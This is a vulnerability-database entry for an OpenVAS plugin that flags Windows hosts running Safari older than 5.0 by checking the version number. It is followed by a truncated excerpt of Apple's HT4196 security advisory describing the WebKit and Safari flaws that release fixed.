ID OPENVAS:801362 Type openvas Reporter Copyright (c) 2010 Greenbone Networks GmbH Modified 2017-02-10T00:00:00
Description
This host is installed with Apple Safari Web Browser and is prone to
to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_apple_safari_mult_vuln_jun10.nasl 5263 2017-02-10 13:45:51Z teissa $
#
# Apple Safari Multiple Vulnerabilities (June-10)
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_insight = "The multiple issues are caused by use-after-free, double free, integer
truncation, heap overflow, memory corruption, uninitialized memory access,
input validation and implementation errors in ColorSync and WebKit.
NOTE: For more information, refer to,
http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html";
tag_impact = "Successful exploitation will allow attacker to bypass certain security
checks, gain knowledge of sensitive information or execute arbitrary code
by tricking a user into visiting a specially crafted web page.
Impact Level: Application";
tag_affected = "Apple Safari version prior to 5.0(5.33.16.0) on Windows.";
tag_solution = "Upgrade to Apple Safari version 5.0 or later,
For updates refer to http://www.apple.com/support/downloads";
tag_summary = "This host is installed with Apple Safari Web Browser and is prone to
to multiple vulnerabilities.";
if(description)
{
script_id(801362);
script_version("$Revision: 5263 $");
script_tag(name:"last_modification", value:"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $");
script_tag(name:"creation_date", value:"2010-06-16 08:26:33 +0200 (Wed, 16 Jun 2010)");
script_cve_id("CVE-2010-1385", "CVE-2010-1384", "CVE-2010-1390", "CVE-2010-1389",
"CVE-2010-1391", "CVE-2010-1393", "CVE-2010-1392", "CVE-2010-1394",
"CVE-2010-1395", "CVE-2010-1396", "CVE-2010-1398", "CVE-2010-1397",
"CVE-2010-1400", "CVE-2010-1399", "CVE-2010-1401", "CVE-2010-1403",
"CVE-2010-1402", "CVE-2010-1404", "CVE-2010-1406", "CVE-2010-1405",
"CVE-2010-1408", "CVE-2010-1409", "CVE-2010-1410", "CVE-2010-1413",
"CVE-2010-1412", "CVE-2010-1414", "CVE-2010-1416", "CVE-2010-1415",
"CVE-2010-1417", "CVE-2010-1422", "CVE-2010-1750", "CVE-2010-1749",
"CVE-2010-1418", "CVE-2010-0544", "CVE-2010-1419", "CVE-2010-1758",
"CVE-2010-1421", "CVE-2010-1761", "CVE-2010-1759", "CVE-2010-1762",
"CVE-2010-1770", "CVE-2010-1764", "CVE-2010-1774", "CVE-2010-1771",
"CVE-2010-2264");
script_bugtraq_id(40620);
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_name("Apple Safari Multiple Vulnerabilities (June-10)");
script_xref(name : "URL" , value : "http://support.apple.com/kb/HT4196");
script_xref(name : "URL" , value : "http://secunia.com/advisories/40105");
script_xref(name : "URL" , value : "http://www.vupen.com/english/advisories/2010/1373");
script_xref(name : "URL" , value : "http://securitytracker.com/alerts/2010/Jun/1024067.html");
script_xref(name : "URL" , value : "http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html");
script_tag(name:"qod_type", value:"registry");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
script_family("General");
script_dependencies("secpod_apple_safari_detect_win_900003.nasl");
script_require_keys("AppleSafari/Version");
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name : "insight" , value : tag_insight);
exit(0);
}
include("version_func.inc");
safariVer = get_kb_item("AppleSafari/Version");
if(!safariVer){
exit(0);
}
# Check for Apple Safari Version 5.0(5.33.16.0) and prior.
if(version_is_less(version:safariVer, test_version:"5.33.16.0")){
security_message(0);
}
{"id": "OPENVAS:801362", "type": "openvas", "bulletinFamily": "scanner", "title": "Apple Safari Multiple Vulnerabilities (June-10)", "description": "This host is installed with Apple Safari Web Browser and is prone to\n to multiple vulnerabilities.", "published": "2010-06-16T00:00:00", "modified": "2017-02-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801362", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["http://securitytracker.com/alerts/2010/Jun/1024067.html", "http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html", "http://www.vupen.com/english/advisories/2010/1373", "http://support.apple.com/kb/HT4196", "http://secunia.com/advisories/40105"], "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1385", "CVE-2010-1759", "CVE-2010-1384", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-2264", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1750", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1399"], "lastseen": "2017-07-02T21:09:52", "viewCount": 0, "enchantments": {"score": {"value": 9.7, "vector": "NONE", "modified": "2017-07-02T21:09:52", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24003", "SECURITYVULNS:VULN:10908", "SECURITYVULNS:DOC:23998", "SECURITYVULNS:DOC:24005", "SECURITYVULNS:DOC:23999"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801362", "OPENVAS:67711", "OPENVAS:831343", "OPENVAS:840517", "OPENVAS:136141256231067711", "OPENVAS:1361412562310840517", "OPENVAS:1361412562310831343", "OPENVAS:862410", "OPENVAS:1361412562310862410", "OPENVAS:862409"]}, {"type": "nessus", "idList": ["ITUNES_9_2_BANNER.NASL", "UBUNTU_USN-1006-1.NASL", "SAFARI_5_0.NASL", "FEDORA_2010-14409.NASL", "FEDORA_2010-14419.NASL", "ITUNES_9_2.NASL", "SUSE_11_3_LIBWEBKIT-100723.NASL", "FREEBSD_PKG_19419B3B92BD11DFB1400015F2DB7BDE.NASL", "MANDRIVA_MDVSA-2011-039.NASL", "MACOSX_SAFARI5_0.NASL"]}, {"type": "freebsd", "idList": ["19419B3B-92BD-11DF-B140-0015F2DB7BDE"]}, {"type": "cve", "idList": ["CVE-2010-1410", "CVE-2010-1413", "CVE-2010-1750", "CVE-2010-2264", "CVE-2010-1393", "CVE-2010-1404", "CVE-2010-1414", "CVE-2010-1403", "CVE-2010-1399", "CVE-2010-1394"]}, {"type": "threatpost", "idList": ["THREATPOST:22ED6878D0517D9CCACC4081F9960C6C"]}, {"type": "ubuntu", "idList": ["USN-1006-1"]}, {"type": "fedora", "idList": ["FEDORA:AEC99110E7A", "FEDORA:2EC081110A7", "FEDORA:350F6111223", "FEDORA:643E6110B91", "FEDORA:278B9111139", "FEDORA:40EED1109D9", "FEDORA:059E31111B3", "FEDORA:B9475110A91"]}, {"type": "seebug", "idList": ["SSV:30108"]}, {"type": "zdi", "idList": ["ZDI-10-096", "ZDI-10-099"]}], "modified": "2017-07-02T21:09:52", "rev": 2}, "vulnersScore": 9.7}, "pluginID": "801362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_safari_mult_vuln_jun10.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities (June-10)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"The multiple issues are caused by use-after-free, double free, integer\n truncation, heap overflow, memory corruption, uninitialized memory access,\n input validation and implementation errors in ColorSync and WebKit.\n\n NOTE: For more information, refer to,\n\n http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html\";\n\ntag_impact = \"Successful exploitation will allow attacker to bypass certain security\n checks, gain knowledge of sensitive information or execute arbitrary code\n by tricking a user into visiting a specially crafted web page.\n Impact Level: Application\";\ntag_affected = \"Apple Safari version prior to 5.0(5.33.16.0) on Windows.\";\ntag_solution = \"Upgrade to Apple Safari version 5.0 or later,\n For updates refer to http://www.apple.com/support/downloads\";\ntag_summary = \"This host is installed with Apple Safari Web Browser and is prone to\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(801362);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-16 08:26:33 +0200 (Wed, 16 Jun 2010)\");\n script_cve_id(\"CVE-2010-1385\", \"CVE-2010-1384\", \"CVE-2010-1390\", \"CVE-2010-1389\",\n \"CVE-2010-1391\", \"CVE-2010-1393\", \"CVE-2010-1392\", \"CVE-2010-1394\",\n \"CVE-2010-1395\", \"CVE-2010-1396\", \"CVE-2010-1398\", \"CVE-2010-1397\",\n \"CVE-2010-1400\", \"CVE-2010-1399\", \"CVE-2010-1401\", \"CVE-2010-1403\",\n \"CVE-2010-1402\", \"CVE-2010-1404\", \"CVE-2010-1406\", \"CVE-2010-1405\",\n \"CVE-2010-1408\", \"CVE-2010-1409\", \"CVE-2010-1410\", \"CVE-2010-1413\",\n \"CVE-2010-1412\", \"CVE-2010-1414\", \"CVE-2010-1416\", \"CVE-2010-1415\",\n \"CVE-2010-1417\", \"CVE-2010-1422\", \"CVE-2010-1750\", \"CVE-2010-1749\",\n \"CVE-2010-1418\", \"CVE-2010-0544\", \"CVE-2010-1419\", \"CVE-2010-1758\",\n \"CVE-2010-1421\", \"CVE-2010-1761\", \"CVE-2010-1759\", \"CVE-2010-1762\",\n \"CVE-2010-1770\", \"CVE-2010-1764\", \"CVE-2010-1774\", \"CVE-2010-1771\",\n \"CVE-2010-2264\");\n script_bugtraq_id(40620);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities (June-10)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4196\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40105\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1373\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Jun/1024067.html\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2010/Jun/msg00000.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafariVer = get_kb_item(\"AppleSafari/Version\");\nif(!safariVer){\n exit(0);\n}\n\n# Check for Apple Safari Version 5.0(5.33.16.0) and prior.\nif(version_is_less(version:safariVer, test_version:\"5.33.16.0\")){\n security_message(0);\n}\n", "naslFamily": "General"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:35", "bulletinFamily": "software", "cvelist": ["CVE-2010-0544", "CVE-2010-1412", "CVE-2010-1397", "CVE-2010-1416", "CVE-2010-1396", "CVE-2010-1417", "CVE-2010-1409", "CVE-2010-1749", "CVE-2010-1758", "CVE-2010-1771", "CVE-2010-1410", "CVE-2010-1415", "CVE-2010-1419", "CVE-2010-1389", "CVE-2010-1391", "CVE-2010-1385", "CVE-2010-1759", "CVE-2009-1726", "CVE-2010-1384", "CVE-2010-1388", "CVE-2010-1774", "CVE-2010-1395", "CVE-2010-1400", "CVE-2010-1406", "CVE-2010-1418", "CVE-2010-1119", "CVE-2010-1398", "CVE-2010-1401", "CVE-2010-1413", "CVE-2010-1408", "CVE-2010-1403", "CVE-2010-1404", "CVE-2010-1761", "CVE-2010-1422", "CVE-2010-1390", "CVE-2010-1393", "CVE-2010-1770", "CVE-2010-1392", "CVE-2010-1750", "CVE-2010-1402", "CVE-2010-1762", "CVE-2010-1764", "CVE-2010-1405", "CVE-2010-1414", "CVE-2010-1421", "CVE-2010-1394", "CVE-2010-1399"], "description": "About the security content of Safari 5.0 and Safari 4.1\r\n\r\n * Last Modified: June 07, 2010\r\n * Article: HT4196\r\n\r\n[Email this article]\r\n[Print this page]\r\nSummary\r\n\r\nThis document describes the security content of Safari 5.0 and Safari 4.1.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nSafari 4 (Mac OS X 10.4), Safari 5 (Windows), Safari 5 (Mac OS X 10.6), Safari 5 (Mac OS X 10.5)\r\nSafari 5.0\r\n\r\n *\r\n\r\n ColorSync\r\n\r\n CVE-ID: CVE-2009-1726\r\n\r\n Available for: Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Viewing a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of images with an embedded ColorSync profile. Opening a maliciously crafted image with an embedded ColorSync profile may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of ColorSync profiles. Credit to Chris Evans of the Google Security Team, and Andrzej Dyjak for reporting this issue.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2010-1384\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: A maliciously crafted URL may be obfuscated, making phishing attacks more effective\r\n\r\n Description: Safari supports the inclusion of user information in URLs, which allows the URL to specify a username and password to authenticate the user to the named server. These URLs are often used to confuse users, which can potentially aid phishing attacks. Safari is updated to display a warning before navigating to an HTTP or HTTPS URL containing user information. Credit to Abhishek Arya of Google, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2010-1385\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in Safari's handling of PDF files. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of PDF files. Credit to Borja Marcos of Sarenet for reporting this issue.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2010-1750\r\n\r\n Available for: Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in Safari's management of windows. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved window management. This issue does not affect Mac OS X systems.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1388\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later\r\n\r\n Impact: Dragging or pasting links or images may lead to an information disclosure\r\n\r\n Description: An implementation issue exists in WebKit's handling of URLs in the clipboard. Visiting a maliciously crafted website and dragging or pasting links or images may send files from the user's system to a remote server. This issue is addressed through additional validation of URLs in the clipboard. This issue does not affect Windows systems. Credit to Eric Seidel of Google, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1389\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Dragging or pasting a selection may lead to a cross-site scripting attack\r\n\r\n Description: Dragging or pasting a selection from one site to another may allow scripts contained in the selection to be executed in the context of the new site. This issue is addressed through additional validation of content before a paste or a drag and drop operation. Credit to Paul Stone of Context Information Security for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1390\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a website using UTF-7 encoding may lead to a cross-site scripting attack\r\n\r\n Description: A canonicalization issue exists in WebKit's handling of UTF-7 encoded text. An HTML quoted string may be left unterminated, leading to a cross-site scripting attack or other issues. This issue is addressed by removing support for UTF-7 encoding in WebKit. Credit to Masahiro Yamada for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1391\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may cause files to be created in arbitrary user-writable locations\r\n\r\n Description: A path traversal issue exists in WebKit's support for Local Storage and Web SQL databases. If accessed from an application-defined scheme containing '%2f' (/) or '%5c' (\) and '..' in the host section of the URL, a maliciously crafted website may cause database files to be created outside of the designated directory. This issue is addressed by encoding characters that may have special meaning in pathnames. This issue does not affect sites served from http: or https: schemes. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1392\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's rendering of HTML buttons. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. Credit to Matthieu Bonetti of VUPEN Vulnerability Research Team for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1393\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an information disclosure\r\n\r\n Description: An information disclosure issue exists in WebKit's handling of Cascading Stylesheets. If a stylesheet's HREF attribute is set to a URL that causes a redirection, scripts on the page may be able to access the redirected URL. Visiting a maliciously crafted website may lead to the disclosure of sensitive URLs on another site. This issue is addressed by returning the original URL to scripts, rather than the redirected URL.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1119\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.1 or later, Mac OS X Server v10.6.1 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of attribute manipulation. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory reference tracking. Credit to Ralf Philipp Weinmann working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1394\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack\r\n\r\n Description: A design issue exists in WebKit's handling of HTML document fragments. The contents of HTML document fragments are processed before a fragment is actually added to a document. Visiting a maliciously crafted website could lead to a cross-site scripting attack if a legitimate website attempts to manipulate a document fragment containing untrusted data. This issue is addressed by ensuring that initial fragment parsing has no side effects on the document that created the fragment. Credit to Eduardo Vela Nava (sirdarckcat) of Google Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1422\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Interacting with a maliciously crafted website may result in unexpected actions on other sites\r\n\r\n Description: An implementation issue exists in WebKit's handling of keyboard focus. If the keyboard focus changes during the processing of key presses, WebKit may deliver an event to the newly-focused frame, instead of the frame that had focus when the key press occurred. A maliciously crafted website may be able to manipulate a user into taking an unexpected action, such as initiating a purchase. This issue is addressed by preventing the delivery of key press events if the keyboard focus changes during processing. Credit to Michal Zalewski of Google, Inc. for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1395\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a malicious site may lead to a cross-site scripting attack\r\n\r\n Description: A scope management issue exists in WebKit's handling of DOM constructor objects. Visiting a malicious site may lead to a cross-site scripting attack. This issue is addressed through improved handling of DOM constructor objects. Credit to Gianni "gf3" Chiappetta of Runlevel6 for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1396\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of the removal of container elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory reference tracking. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1397\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's rendering of a selection when the layout changes. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of selections. Credit to wushi&Z of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1398\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's handling of ordered list insertions. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of list insertions. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1399\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in WebKit's handling of selection changes on form input elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of selections. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1400\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of caption elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of caption elements. Credit to regenrecht working with iDefense for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1401\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A use after free issue exists in WebKit's handling of the ':first-letter' pseudo-element in cascading stylesheets. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of the ':first-letter' pseudo-element. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1402\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A double free issue exists in WebKit's handling of event listeners in SVG documents. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of SVG documents. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1403\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6.2 or later, Mac OS X Server v10.6.2 or later, Windows 7, Vista, XP SP2 or later\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in WebKit's handling of 'use' elements in SVG documents. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of 'use' elements in SVG documents. Credit to wushi of team509, working with TippingPoint's Zero Day Initiative, for reporting this issue.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2010-1404\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.8, Mac OS X Server v10.5.8, 